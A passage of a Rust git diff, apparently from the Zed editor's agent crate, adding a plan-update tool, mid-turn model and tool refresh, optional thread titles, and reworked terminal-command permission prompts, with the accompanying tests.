permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["npm install && npm test | tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { patterns, .. } = permission_options else { + panic!("Expected DropdownWithPatterns for chained pipeline command"); + }; + + // With subcommand-aware patterns, "npm install" and "npm test" are distinct + assert_eq!(patterns.len(), 3); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"npm install")); + assert!(pattern_names.contains(&"npm test")); + assert!(pattern_names.contains(&"tail")); } #[gpui::test] @@ -3048,7 +3131,7 @@ async fn test_title_generation(cx: &mut TestAppContext) { fake_model.send_last_completion_stream_text_chunk("Hey!"); fake_model.end_last_completion_stream(); cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "New Thread")); + thread.read_with(cx, |thread, _| assert_eq!(thread.title(), None)); // Ensure the summary model has been invoked to generate a title. summary_model.send_last_completion_stream_text_chunk("Hello "); @@ -3057,7 +3140,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { summary_model.end_last_completion_stream(); send.collect::>().await; cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); // Send another message, ensuring no title is generated this time. 
let send = thread @@ -3071,7 +3156,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { cx.run_until_parked(); assert_eq!(summary_model.pending_completions(), Vec::new()); send.collect::>().await; - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); } #[gpui::test] @@ -3177,20 +3264,12 @@ async fn test_agent_connection(cx: &mut TestAppContext) { let fake_fs = cx.update(|cx| fs::FakeFs::new(cx.background_executor().clone())); fake_fs.insert_tree(path!("/test"), json!({})).await; let project = Project::test(fake_fs.clone(), [Path::new("/test")], cx).await; - let cwd = Path::new("/test"); + let cwd = PathList::new(&[Path::new("/test")]); let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create agent and connection - let agent = NativeAgent::new( - project.clone(), - thread_store, - templates.clone(), - None, - fake_fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates.clone(), None, fake_fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread using new_thread @@ -3364,6 +3443,122 @@ async fn test_tool_updates_to_completion(cx: &mut TestAppContext) { ); } +#[gpui::test] +async fn test_update_plan_tool_updates_thread_events(cx: &mut TestAppContext) { + let ThreadTest { thread, model, .. 
} = setup(cx, TestModel::Fake).await; + thread.update(cx, |thread, _cx| thread.add_tool(UpdatePlanTool)); + let fake_model = model.as_fake(); + + let mut events = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Make a plan"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + let input = json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + "priority": "high" + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + "priority": "low" + } + ] + }); + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "plan_1".into(), + name: UpdatePlanTool::NAME.into(), + raw_input: input.to_string(), + input, + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + let tool_call = expect_tool_call(&mut events).await; + assert_eq!( + tool_call, + acp::ToolCall::new("plan_1", "Update plan") + .kind(acp::ToolKind::Think) + .raw_input(json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + "priority": "high" + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + "priority": "low" + } + ] + })) + .meta(acp::Meta::from_iter([( + "tool_name".into(), + "update_plan".into() + )])) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new().status(acp::ToolCallStatus::InProgress) + ) + ); + + let plan = expect_plan(&mut events).await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the code", + acp::PlanEntryPriority::High, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + 
acp::PlanEntry::new( + "Run tests", + acp::PlanEntryPriority::Low, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new() + .status(acp::ToolCallStatus::Completed) + .raw_output("Plan updated") + ) + ); +} + #[gpui::test] async fn test_send_no_retry_on_success(cx: &mut TestAppContext) { let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await; @@ -3770,6 +3965,7 @@ async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { StreamingEchoTool::NAME: true, StreamingFailingEchoTool::NAME: true, TerminalTool::NAME: true, + UpdatePlanTool::NAME: true, } } } @@ -4388,23 +4584,16 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4530,23 +4719,16 @@ async fn test_subagent_tool_output_does_not_include_thinking(cx: &mut TestAppCon .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + 
NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4685,23 +4867,16 @@ async fn test_subagent_tool_call_cancellation_during_task_prompt(cx: &mut TestAp .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4822,23 +4997,16 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4987,48 +5155,6 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) { ); 
} -#[gpui::test] -async fn test_subagent_tool_is_present_when_feature_flag_enabled(cx: &mut TestAppContext) { - init_test(cx); - - cx.update(|cx| { - cx.update_flags(true, vec!["subagents".to_string()]); - }); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/test"), json!({})).await; - let project = Project::test(fs, [path!("/test").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - - let environment = Rc::new(cx.update(|cx| { - FakeThreadEnvironment::default().with_terminal(FakeTerminalHandle::new_never_exits(cx)) - })); - - let thread = cx.new(|cx| { - let mut thread = Thread::new( - project.clone(), - project_context, - context_server_registry, - Templates::new(), - Some(model), - cx, - ); - thread.add_default_tools(environment, cx); - thread - }); - - thread.read_with(cx, |thread, _| { - assert!( - thread.has_registered_tool(SpawnAgentTool::NAME), - "subagent tool should be present when feature flag is enabled" - ); - }); -} - #[gpui::test] async fn test_subagent_thread_inherits_parent_thread_properties(cx: &mut TestAppContext) { init_test(cx); @@ -5201,23 +5327,16 @@ async fn test_subagent_context_window_warning(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { 
connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5334,23 +5453,16 @@ async fn test_subagent_no_context_window_warning_when_already_at_warning(cx: &mu .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5515,23 +5627,16 @@ async fn test_subagent_error_propagation(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -6529,3 +6634,110 @@ async fn test_streaming_tool_error_waits_for_prior_tools_to_complete(cx: &mut Te ] ); } + +#[gpui::test] +async fn test_mid_turn_model_and_settings_refresh(cx: &mut TestAppContext) { + let ThreadTest { + model, thread, fs, .. 
+ } = setup(cx, TestModel::Fake).await; + let fake_model_a = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(EchoTool); + thread.add_tool(DelayTool); + }); + + // Set up two profiles: profile-a has both tools, profile-b has only DelayTool. + fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "profiles": { + "profile-a": { + "name": "Profile A", + "tools": { + EchoTool::NAME: true, + DelayTool::NAME: true, + } + }, + "profile-b": { + "name": "Profile B", + "tools": { + DelayTool::NAME: true, + } + } + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + cx.run_until_parked(); + + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-a".into()), cx); + thread.set_thinking_enabled(false, cx); + }); + + // Send a message — first iteration starts with model A, profile-a, thinking off. + thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["test mid-turn refresh"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + // Verify first request has both tools and thinking disabled. + let completions = fake_model_a.pending_completions(); + assert_eq!(completions.len(), 1); + let first_tools = tool_names_for_completion(&completions[0]); + assert_eq!(first_tools, vec![DelayTool::NAME, EchoTool::NAME]); + assert!(!completions[0].thinking_allowed); + + // Model A responds with an echo tool call. + fake_model_a.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "tool_1".into(), + name: "echo".into(), + raw_input: r#"{"text":"hello"}"#.into(), + input: json!({"text": "hello"}), + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model_a.end_last_completion_stream(); + + // Before the next iteration runs, switch to profile-b (only DelayTool), + // swap in a new model, and enable thinking. 
+ let fake_model_b = Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "model-b", + "Model B", + true, + )); + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-b".into()), cx); + thread.set_model(fake_model_b.clone() as Arc, cx); + thread.set_thinking_enabled(true, cx); + }); + + // Run until parked — processes the echo tool call, loops back, picks up + // the new model/profile/thinking, and makes a second request to model B. + cx.run_until_parked(); + + // The second request should have gone to model B. + let model_b_completions = fake_model_b.pending_completions(); + assert_eq!( + model_b_completions.len(), + 1, + "second request should go to model B" + ); + + // Profile-b only has DelayTool, so echo should be gone. + let second_tools = tool_names_for_completion(&model_b_completions[0]); + assert_eq!(second_tools, vec![DelayTool::NAME]); + + // Thinking should now be enabled. + assert!(model_b_completions[0].thinking_allowed); +} diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index e61a395e71f93d49d63d378355c89e44359db835..39f5a9df902744875a9faaa1651d65842c1dbf11 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -3,17 +3,18 @@ use crate::{ DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, StreamingEditFileTool, - SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, WebSearchTool, - decide_permission_from_settings, + SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, + UpdatePlanTool, WebSearchTool, decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; -use feature_flags::{FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag}; +use feature_flags::{ + FeatureFlagAppExt as _, 
StreamingEditFileToolFeatureFlag, UpdatePlanToolFeatureFlag, +}; use agent_client_protocol as acp; use agent_settings::{ - AgentProfileId, AgentProfileSettings, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, - SUMMARIZE_THREAD_PROMPT, + AgentProfileId, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, SUMMARIZE_THREAD_PROMPT, }; use anyhow::{Context as _, Result, anyhow}; use chrono::{DateTime, Utc}; @@ -219,6 +220,7 @@ impl UserMessage { "\nThe user has specified the following rules that should be applied:\n"; const OPEN_DIAGNOSTICS_TAG: &str = ""; const OPEN_DIFFS_TAG: &str = ""; + const MERGE_CONFLICT_TAG: &str = ""; let mut file_context = OPEN_FILES_TAG.to_string(); let mut directory_context = OPEN_DIRECTORIES_TAG.to_string(); @@ -229,6 +231,7 @@ impl UserMessage { let mut rules_context = OPEN_RULES_TAG.to_string(); let mut diagnostics_context = OPEN_DIAGNOSTICS_TAG.to_string(); let mut diffs_context = OPEN_DIFFS_TAG.to_string(); + let mut merge_conflict_context = MERGE_CONFLICT_TAG.to_string(); for chunk in &self.content { let chunk = match chunk { @@ -336,6 +339,18 @@ impl UserMessage { ) .ok(); } + MentionUri::MergeConflict { file_path } => { + write!( + &mut merge_conflict_context, + "\nMerge conflict in {}:\n{}", + file_path, + MarkdownCodeBlock { + tag: "diff", + text: content + } + ) + .ok(); + } } language_model::MessageContent::Text(uri.as_link().to_string()) @@ -410,6 +425,13 @@ impl UserMessage { .push(language_model::MessageContent::Text(diagnostics_context)); } + if merge_conflict_context.len() > MERGE_CONFLICT_TAG.len() { + merge_conflict_context.push_str("\n"); + message + .content + .push(language_model::MessageContent::Text(merge_conflict_context)); + } + if message.content.len() > len_before_context { message.content.insert( len_before_context, @@ -641,6 +663,7 @@ pub enum ThreadEvent { AgentThinking(String), ToolCall(acp::ToolCall), ToolCallUpdate(acp_thread::ToolCallUpdate), + Plan(acp::Plan), ToolCallAuthorization(ToolCallAuthorization), 
SubagentSpawned(acp::SessionId), Retry(acp_thread::RetryStatus), @@ -738,6 +761,48 @@ impl ToolPermissionContext { true }; + // For terminal commands with multiple pipeline commands, use DropdownWithPatterns + // to let users individually select which command patterns to always allow. + if tool_name == TerminalTool::NAME && shell_supports_always_allow { + if let Some(input) = input_values.first() { + let all_patterns = extract_all_terminal_patterns(input); + if all_patterns.len() > 1 { + let mut choices = Vec::new(); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_allow:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::AllowAlways, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_deny:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::RejectAlways, + ), + sub_patterns: vec![], + }); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new("allow"), + "Only this time", + acp::PermissionOptionKind::AllowOnce, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new("deny"), + "Only this time", + acp::PermissionOptionKind::RejectOnce, + ), + sub_patterns: vec![], + }); + return acp_thread::PermissionOptions::DropdownWithPatterns { + choices, + patterns: all_patterns, + tool_name: tool_name.clone(), + }; + } + } + } + let extract_for_value = |value: &str| -> (Option, Option) { if tool_name == TerminalTool::NAME { ( @@ -786,20 +851,22 @@ impl ToolPermissionContext { let mut choices = Vec::new(); - let mut push_choice = |label: String, allow_id, deny_id, allow_kind, deny_kind| { - choices.push(acp_thread::PermissionOptionChoice { - allow: acp::PermissionOption::new( - acp::PermissionOptionId::new(allow_id), - label.clone(), - allow_kind, - ), - deny: 
acp::PermissionOption::new( - acp::PermissionOptionId::new(deny_id), - label, - deny_kind, - ), - }); - }; + let mut push_choice = + |label: String, allow_id, deny_id, allow_kind, deny_kind, sub_patterns: Vec| { + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new(allow_id), + label.clone(), + allow_kind, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(deny_id), + label, + deny_kind, + ), + sub_patterns, + }); + }; if shell_supports_always_allow { push_choice( @@ -808,6 +875,7 @@ impl ToolPermissionContext { format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![], ); if let (Some(pattern), Some(display)) = (pattern, pattern_display) { @@ -818,10 +886,11 @@ impl ToolPermissionContext { }; push_choice( button_text, - format!("always_allow_pattern:{}\n{}", tool_name, pattern), - format!("always_deny_pattern:{}\n{}", tool_name, pattern), + format!("always_allow:{}", tool_name), + format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![pattern], ); } } @@ -832,6 +901,7 @@ impl ToolPermissionContext { "deny".to_string(), acp::PermissionOptionKind::AllowOnce, acp::PermissionOptionKind::RejectOnce, + vec![], ); acp_thread::PermissionOptions::Dropdown(choices) @@ -842,7 +912,7 @@ impl ToolPermissionContext { pub struct ToolCallAuthorization { pub tool_call: acp::ToolCallUpdate, pub options: acp_thread::PermissionOptions, - pub response: oneshot::Sender, + pub response: oneshot::Sender, pub context: Option, } @@ -1242,7 +1312,7 @@ impl Thread { pub fn to_db(&self, cx: &App) -> Task { let initial_project_snapshot = self.initial_project_snapshot.clone(); let mut thread = DbThread { - title: self.title(), + title: self.title().unwrap_or_default(), messages: self.messages.clone(), updated_at: self.updated_at, detailed_summary: self.summary.clone(), 
@@ -1462,6 +1532,9 @@ impl Thread { self.add_tool(MovePathTool::new(self.project.clone())); self.add_tool(NowTool); self.add_tool(OpenTool::new(self.project.clone())); + if cx.has_flag::() { + self.add_tool(UpdatePlanTool); + } self.add_tool(ReadFileTool::new( self.project.clone(), self.action_log.clone(), @@ -1750,11 +1823,6 @@ impl Thread { self.flush_pending_message(cx); self.cancel(cx).detach(); - let model = self.model.clone().context("No language model configured")?; - let profile = AgentSettings::get_global(cx) - .profiles - .get(&self.profile_id) - .context("Profile not found")?; let (events_tx, events_rx) = mpsc::unbounded::>(); let event_stream = ThreadEventStream(events_tx); let message_ix = self.messages.len().saturating_sub(1); @@ -1762,20 +1830,15 @@ impl Thread { let (cancellation_tx, mut cancellation_rx) = watch::channel(false); self.running_turn = Some(RunningTurn { event_stream: event_stream.clone(), - tools: self.enabled_tools(profile, &model, cx), + tools: self.enabled_tools(cx), cancellation_tx, streaming_tool_inputs: HashMap::default(), _task: cx.spawn(async move |this, cx| { log::debug!("Starting agent turn execution"); - let turn_result = Self::run_turn_internal( - &this, - model, - &event_stream, - cancellation_rx.clone(), - cx, - ) - .await; + let turn_result = + Self::run_turn_internal(&this, &event_stream, cancellation_rx.clone(), cx) + .await; // Check if we were cancelled - if so, cancel() already took running_turn // and we shouldn't touch it (it might be a NEW turn now) @@ -1817,7 +1880,6 @@ impl Thread { async fn run_turn_internal( this: &WeakEntity, - model: Arc, event_stream: &ThreadEventStream, mut cancellation_rx: watch::Receiver, cx: &mut AsyncApp, @@ -1825,8 +1887,15 @@ impl Thread { let mut attempt = 0; let mut intent = CompletionIntent::UserPrompt; loop { - let request = - this.update(cx, |this, cx| this.build_completion_request(intent, cx))??; + // Re-read the model and refresh tools on each iteration so that + // mid-turn 
changes (e.g. the user switches model, toggles tools, + // or changes profile) take effect between tool-call rounds. + let (model, request) = this.update(cx, |this, cx| { + let model = this.model.clone().context("No language model configured")?; + this.refresh_turn_tools(cx); + let request = this.build_completion_request(intent, cx)?; + anyhow::Ok((model, request)) + })??; telemetry::event!( "Agent Thread Completion", @@ -2422,8 +2491,8 @@ impl Thread { } } - pub fn title(&self) -> SharedString { - self.title.clone().unwrap_or("New Thread".into()) + pub fn title(&self) -> Option { + self.title.clone() } pub fn is_generating_summary(&self) -> bool { @@ -2549,6 +2618,14 @@ impl Thread { .is_some() { _ = this.update(cx, |this, cx| this.set_title(title.into(), cx)); + } else { + // Emit TitleUpdated even on failure so that the propagation + // chain (agent::Thread → NativeAgent → AcpThread) fires and + // clears any provisional title that was set before the turn. + _ = this.update(cx, |_, cx| { + cx.emit(TitleUpdated); + cx.notify(); + }); } _ = this.update(cx, |this, _| this.pending_title_generation = None); })); @@ -2671,12 +2748,13 @@ impl Thread { Ok(request) } - fn enabled_tools( - &self, - profile: &AgentProfileSettings, - model: &Arc, - cx: &App, - ) -> BTreeMap> { + fn enabled_tools(&self, cx: &App) -> BTreeMap> { + let Some(model) = self.model.as_ref() else { + return BTreeMap::new(); + }; + let Some(profile) = AgentSettings::get_global(cx).profiles.get(&self.profile_id) else { + return BTreeMap::new(); + }; fn truncate(tool_name: &SharedString) -> SharedString { if tool_name.len() > MAX_TOOL_NAME_LENGTH { let mut truncated = tool_name.to_string(); @@ -2757,6 +2835,13 @@ impl Thread { tools } + fn refresh_turn_tools(&mut self, cx: &App) { + let tools = self.enabled_tools(cx); + if let Some(turn) = self.running_turn.as_mut() { + turn.tools = tools; + } + } + fn tool(&self, name: &str) -> Option> { self.running_turn.as_ref()?.tools.get(name).cloned() } @@ 
-3000,7 +3085,8 @@ struct RunningTurn { /// The current event stream for the running turn. Used to report a final /// cancellation event if we cancel the turn. event_stream: ThreadEventStream, - /// The tools that were enabled for this turn. + /// The tools that are enabled for the current iteration of the turn. + /// Refreshed at the start of each iteration via `refresh_turn_tools`. tools: BTreeMap>, /// Sender to signal tool cancellation. When cancel is called, this is /// set to true so all tools can detect user-initiated cancellation. @@ -3396,6 +3482,10 @@ impl ThreadEventStream { .ok(); } + fn send_plan(&self, plan: acp::Plan) { + self.0.unbounded_send(Ok(ThreadEvent::Plan(plan))).ok(); + } + fn send_retry(&self, status: acp_thread::RetryStatus) { self.0.unbounded_send(Ok(ThreadEvent::Retry(status))).ok(); } @@ -3531,6 +3621,10 @@ impl ToolCallEventStream { .ok(); } + pub fn update_plan(&self, plan: acp::Plan) { + self.stream.send_plan(plan); + } + /// Authorize a third-party tool (e.g., MCP tool from a context server). /// /// Unlike built-in tools, third-party tools don't support pattern-based permissions. 
@@ -3584,6 +3678,7 @@ impl ToolCallEventStream { format!("Always for {} MCP tool", display_name), acp::PermissionOptionKind::RejectAlways, ), + sub_patterns: vec![], }, acp_thread::PermissionOptionChoice { allow: acp::PermissionOption::new( @@ -3596,6 +3691,7 @@ impl ToolCallEventStream { "Only this time", acp::PermissionOptionKind::RejectOnce, ), + sub_patterns: vec![], }, ]), response: response_tx, @@ -3611,40 +3707,13 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - if response_str == format!("always_allow_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); - } - if response_str == format!("always_deny_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } - - if response_str == "allow" { - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } - - Err(anyhow!("Permission to run tool denied by user")) }) } @@ -3654,8 +3723,6 @@ impl ToolCallEventStream { context: ToolPermissionContext, cx: &mut App, ) -> Task> { - use settings::ToolPermissionMode; - let options = context.build_permission_options(); let (response_tx, response_rx) = oneshot::channel(); @@ -3682,90 +3749,118 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - // Handle "always allow 
tool" - e.g., "always_allow:terminal" - if let Some(tool) = response_str.strip_prefix("always_allow:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } + }) + } - // Handle "always deny tool" - e.g., "always_deny:terminal" - if let Some(tool) = response_str.strip_prefix("always_deny:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } + /// Interprets a `SelectedPermissionOutcome` and persists any settings changes. + /// Returns `true` if the tool call should be allowed, `false` if denied. 
+ fn persist_permission_outcome( + outcome: &acp_thread::SelectedPermissionOutcome, + fs: Option>, + cx: &AsyncApp, + ) -> bool { + let option_id = outcome.option_id.0.as_ref(); + + let always_permission = option_id + .strip_prefix("always_allow:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + .or_else(|| { + option_id + .strip_prefix("always_deny:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }) + .or_else(|| { + option_id + .strip_prefix("always_allow_mcp:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + }) + .or_else(|| { + option_id + .strip_prefix("always_deny_mcp:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }); - // Handle "always allow pattern" - e.g., "always_allow_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_allow_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .add_tool_allow_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always allow pattern: missing newline separator in '{rest}'"); - } - return Ok(()); - } + if let Some((tool, mode)) = always_permission { + let params = outcome.params.as_ref(); + Self::persist_always_permission(tool, mode, params, fs, cx); + return mode == ToolPermissionMode::Allow; + } - // Handle "always deny pattern" - e.g., 